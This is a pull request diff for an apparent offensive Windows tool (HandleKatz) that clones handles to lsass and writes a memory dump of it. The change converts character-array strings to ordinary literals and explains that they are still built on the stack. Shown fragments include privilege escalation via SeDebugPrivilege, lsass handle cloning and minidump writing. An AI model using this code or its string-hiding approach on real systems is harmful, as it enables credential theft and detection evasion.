### PR TITLE
Use regular string literals

### DIFF
--- a/src/DumpTools.c
+++ b/src/DumpTools.c
@@ -131,8 +131,8 @@ static  unsigned        dump_system_info(struct dump_context* dc, struct fPtrs *
 
     typedef int(WINAPI* RtlGetNtVersionNumbers)(PDWORD, PDWORD, PDWORD);
 
-    char ntdll[] = { 'n', 't', 'd', 'l', 'l', '.', 'd','l','l',0x00 };
-    char func[] = { 'R', 't', 'l','G','e','t','N','t','V','e','r','s','i','o','n','N','u','m','b','e','r','s',0x00 };
+    char ntdll[] = "ntdll.dll";
+    char func[] = "RtlGetNtVersionNumbers";
     HINSTANCE hinst = function_pointers->_LoadLibrary(ntdll);
     DWORD dwMajor, dwMinor, dwBuildNumber;
     RtlGetNtVersionNumbers proc = (RtlGetNtVersionNumbers)function_pointers->_GetProcAddress(hinst, func);
@@ -312,7 +312,7 @@ static void fetch_module_versioninfo(LPCWSTR filename, VS_FIXEDFILEINFO* ffi, st
 
     DWORD       handle;
     DWORD       sz;
-    WCHAR backslashW[] = { '\\', '\0' };
+    WCHAR backslashW[] = L"\\";
 
     //memset(ffi, 0, sizeof(*ffi));
     for (uint32_t i = 0; i < sizeof(*ffi); i++) {
@@ -494,8 +494,8 @@ static const WCHAR* get_filename(const WCHAR* name, const WCHAR* endptr, struct 
 {
 
     const WCHAR* ptr;
-    char fwd_slash[] = { '/', 0x00 };
-    char back_slash[] = { '\\', 0x00 };
+    char fwd_slash[] = "/";
+    char back_slash[] = "\\";
 
     if (!endptr) endptr = name + function_pointers->_lstrlenW(name);
     for (ptr = endptr - 1; ptr >= name; ptr--)
@@ -508,12 +508,12 @@ static const WCHAR* get_filename(const WCHAR* name, const WCHAR* endptr, struct 
 static int match_ext(const WCHAR* ptr, size_t len, struct fPtrs* function_pointers)
 {
 
-    WCHAR S_AcmW[] = { '.','a','c','m','\0' };
-    WCHAR S_DllW[] = { '.','d','l','l','\0' };
-    WCHAR S_DrvW[] = { '.','d','r','v','\0' };
-    WCHAR S_ExeW[] = { '.','e','x','e','\0' };
-    WCHAR S_OcxW[] = { '.','o','c','x','\0' };
-    WCHAR S_VxdW[] = { '.','v','x','d','\0' };
+    WCHAR S_AcmW[] = L".acm";
+    WCHAR S_DllW[] = L".dll";
+    WCHAR S_DrvW[] = L".drv";
+    WCHAR S_ExeW[] = L".exe";
+    WCHAR S_OcxW[] = L".ocx";
+    WCHAR S_VxdW[] = L".vxd";
     WCHAR* const ext[] = { S_AcmW, S_DllW, S_DrvW, S_ExeW, S_OcxW, S_VxdW, NULL };
 
     WCHAR* const* e;
@@ -532,8 +532,8 @@ static int match_ext(const WCHAR* ptr, size_t len, struct fPtrs* function_pointe
 static void module_fill_module(const WCHAR* in, WCHAR* out, size_t size, struct fPtrs * function_ptrs)
 {
 
-    WCHAR S_DotSoW[] = { '.','s','o','\0' };
-    WCHAR        S_ElfW[] = { '<','e','l','f','>','\0' };
+    WCHAR S_DotSoW[] = L".so";
+    WCHAR        S_ElfW[] = L"<elf>";
 
     const WCHAR* ptr, * endptr;
     size_t      len, l;

--- a/src/HandleKatzPIC.c
+++ b/src/HandleKatzPIC.c
@@ -36,22 +36,22 @@ handleKatz(BOOL b_only_recon, char* ptr_output_path, uint32_t pid, char* ptr_buf
 
     dw_success = setDebugPrivilege(&ptrs_functions);
     if (dw_success == FAIL) {
-        char msg_no_admin[] = { '[','-',']',' ','C','o','u','l','d',' ','n','o','t',' ','e','n','a','b','l','e',' ','D','e','b','u','g',' ','p','r','i','v','i','l','e','g','e','\n', 0x00 };
+        char msg_no_admin[] = "[-] Could not enable Debug privilege\n";
         ptrs_functions._lstrcatA((char*)ptr_buf_output, msg_no_admin);
         goto cleanup;
     }
 
     if (b_only_recon) {
 
-        char msg_do_recon[] = { '[','*',']',' ','C','h','e','c','k','i','n','g',' ','f','o','r',' ','p','r','o','c','e','s','s','e','s',' ','w','i','t','h',' ','a',' ','s','u','i','t','a','b','l','e',' ','h','a','n','d','l','e',' ','t','o',' ','l','s','a','s','s',' ','.','.','.',' ','\n', 0x00 };
+        char msg_do_recon[] = "[*] Checking for processes with a suitable handle to lsass ... \n";
         ptrs_functions._lstrcatA((char*)ptr_buf_output, msg_do_recon);
 
         dw_success = recon((char*)ptr_buf_output, &ptrs_functions);
 
     } else {
 
-        char msg_attempting_clone[] = { '[','*',']',' ','A','t','t','e','m','p','t','i','n','g',' ','t','o',' ','c','l','o','n','e',' ','l','s','a','s','s',' ','h','a','n','d','l','e',' ','f','r','o','m',' ','p','i','d',':',' ','%','d','\n', 0x00};
-        char msg_outfile[] = { '[','*',']',' ','O','u','t','f','i','l','e',':',' ','%','s','\n', 0x00};
+        char msg_attempting_clone[] = "[*] Attempting to clone lsass handle from pid: %d\n";
+        char msg_outfile[] = "[*] Outfile: %s\n";
 
         char line[512] = { 0x00 };
         char line_1[512] = { 0x00 };
@@ -83,24 +83,24 @@ dump(DWORD pid, char* ptr_output, char* outpath, struct fPtrs* ptrs_functions) {
 
     handle_info = get_handles(ptrs_functions);
     if (handle_info == NULL) {
-        char msg_failed_retrieve_handles[] = { '[','-',']',' ','F','a','i','l','e','d',' ','t','o',' ','g','e','t',' ','a',' ','l','i','s','t',' ','o','f',' ','h','a','n','d','l','e','s','\n', 0x00 };
+        char msg_failed_retrieve_handles[] = "[-] Failed to get a list of handles\n";
         ptrs_functions->_lstrcatA(ptr_output, msg_failed_retrieve_handles);
         goto cleanup;
     }
 
     h_lsass = check_handles(handle_info, pid, ptr_output, ptrs_functions);
     if (h_lsass == NULL) {
-        char msg_could_not_find_handle[] = { '[','-',']',' ','C','o','u','l','d',' ','n','o','t',' ','f','i','n','d',' ','a','p','p','r','o','p','r','i','a','t','e',' ','h','a','n','d','l','e',' ','i','n',' ','g','i','v','e','n',' ','p','i','d','\n', 0x00};
+        char msg_could_not_find_handle[] = "[-] Could not find appropriate handle in given pid\n";
         ptrs_functions->_lstrcatA(ptr_output, msg_could_not_find_handle);
         goto cleanup;
     }
 
-    char msg_dumping[] = { '[','*',']',' ','N','o','w',' ','t','r','y','i','n','g',' ','t','o',' ','d','u','m','p',' ','l','s','a','s','s',' ','.','.','.',' ','\n', 0x00};
+    char msg_dumping[] = "[*] Now trying to dump lsass ... \n";
     ptrs_functions->_lstrcatA(ptr_output, msg_dumping);
 
     h_f_dump = ptrs_functions->_CreateFileA(outpath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
     if (h_f_dump == INVALID_HANDLE_VALUE) {
-        char msg_file_error[] = { '[','-',']',' ','C','o','u','l','d',' ','n','o','t',' ','w','r','i','t','e',' ','t','o',' ','s','p','e','c','i','f','i','e','d',' ','o','u','t','p','u','t','f','i','l','e','\n', 0x00};
+        char msg_file_error[] = "[-] Could not write to specified outputfile\n";
         ptrs_functions->_lstrcatA(ptr_output, msg_file_error);
         goto cleanup;
     }
@@ -109,12 +109,12 @@ dump(DWORD pid, char* ptr_output, char* outpath, struct fPtrs* ptrs_functions) {
     dw_success = MiniDumpWriteDumpA(h_lsass, dw_pid_lsass, h_f_dump, ptrs_functions);
 
     if (dw_success == FAIL) {
-        char msg_dump_fail[] = { '[','-',']',' ','S','o','m','e','t','h','i','n','g',' ','w','e','n','t',' ','w','r','o','n','g',' ','w','h','i','l','e',' ','d','u','m','p','i','n','g','\n', 0x00 };
+        char msg_dump_fail[] = "[-] Something went wrong while dumping\n";
         ptrs_functions->_lstrcatA(ptr_output, msg_dump_fail);
         goto cleanup;
     }
 
-    char msg_complete[] = { '[','+',']',' ','L','s','a','s','s',' ','d','u','m','p',' ','i','s',' ','c','o','m','p','l','e','t','e','\n', 0x00};
+    char msg_complete[] = "[+] Lsass dump is complete\n";
     ptrs_functions->_lstrcatA(ptr_output, msg_complete);
 
     dw_success = SUCCESS;
@@ -144,7 +144,7 @@ recon(char* ptr_output, struct fPtrs* ptrs_functions) {
     handle_info = get_handles(ptrs_functions);
     if (handle_info == NULL) {
 
-        char msg_failed_retrieve_handles[] = { '[','-',']',' ','F','a','i','l','e','d',' ','t','o',' ','g','e','t',' ','a',' ','l','i','s','t',' ','o','f',' ','h','a','n','d','l','e','s','\n', 0x00};
+        char msg_failed_retrieve_handles[] = "[-] Failed to get a list of handles\n";
         ptrs_functions->_lstrcatA(ptr_output, msg_failed_retrieve_handles);
         goto cleanup;
 

--- a/src/HandleTools.c
+++ b/src/HandleTools.c
@@ -47,7 +47,7 @@ HANDLE check_handles(PSYSTEM_HANDLE_INFORMATION handle_info, DWORD in_pid, char*
     char* process_name = NULL;
 
     wchar_t str_process[] = { L'P',L'r',L'o',L'c',L'e',L's',L's', 0x00 };
-    char str_lsass[] = { 'l','s','a','s','s', 0x00 };
+    char str_lsass[] = "lsass";
 
     for (idx_handle = 0; idx_handle < handle_info->HandleCount; idx_handle++) {
 
@@ -92,8 +92,8 @@ HANDLE check_handles(PSYSTEM_HANDLE_INFORMATION handle_info, DWORD in_pid, char*
 
                 process_name = (char*)ptr_functions->_PathFindFileNameA(process_path);
 
-                char msg_found[] = { '[','+',']',' ','F','o','u','n','d',' ','a','n','d',' ','s','u','c','c','e','s','s','f','u','l','l','y',' ','c','l','o','n','e','d',' ','h','a','n','d','l','e',' ','(','%','d',')',' ','t','o',' ','l','s','a','s','s',' ','i','n',':',' ','%','s',' ','(','%','d',')','\n', 0x00 };
-                char msg_handle_rights[] = { '\t','[','+',']',' ','H','a','n','d','l','e',' ','R','i','g','h','t','s',':',' ','%','x','\n', 0x00 };
+                char msg_found[] = "[+] Found and successfully cloned handle (%d) to lsass in: %s (%d)\n";
+                char msg_handle_rights[] = "\t[+] Handle Rights: %x\n";
 
                 char tmp[512] = { 0x00 };
                 char tmp_1[512] = { 0x00 };

--- a/src/Misc.c
+++ b/src/Misc.c
@@ -14,7 +14,7 @@ DWORD setDebugPrivilege(struct fPtrs* function_ptrs) {
     TokenPrivileges.PrivilegeCount = 1;
     TokenPrivileges.Privileges[0].Attributes = TRUE ? SE_PRIVILEGE_ENABLED : 0;
 
-    char debug_priv[] = { 'S','e','D','e','b','u','g','P','r','i','v','i','l','e','g','e', 0x00 };
+    char debug_priv[] = "SeDebugPrivilege";
     if (!function_ptrs->_LookupPrivilegeValueA(NULL, debug_priv, &TokenPrivileges.Privileges[0].Luid)) {
         function_ptrs->_CloseHandle(hToken);
         return FAIL;


### PR DESCRIPTION
As long as those are assigned to function-local variables, the
compiler will still generate code to build them on the stack.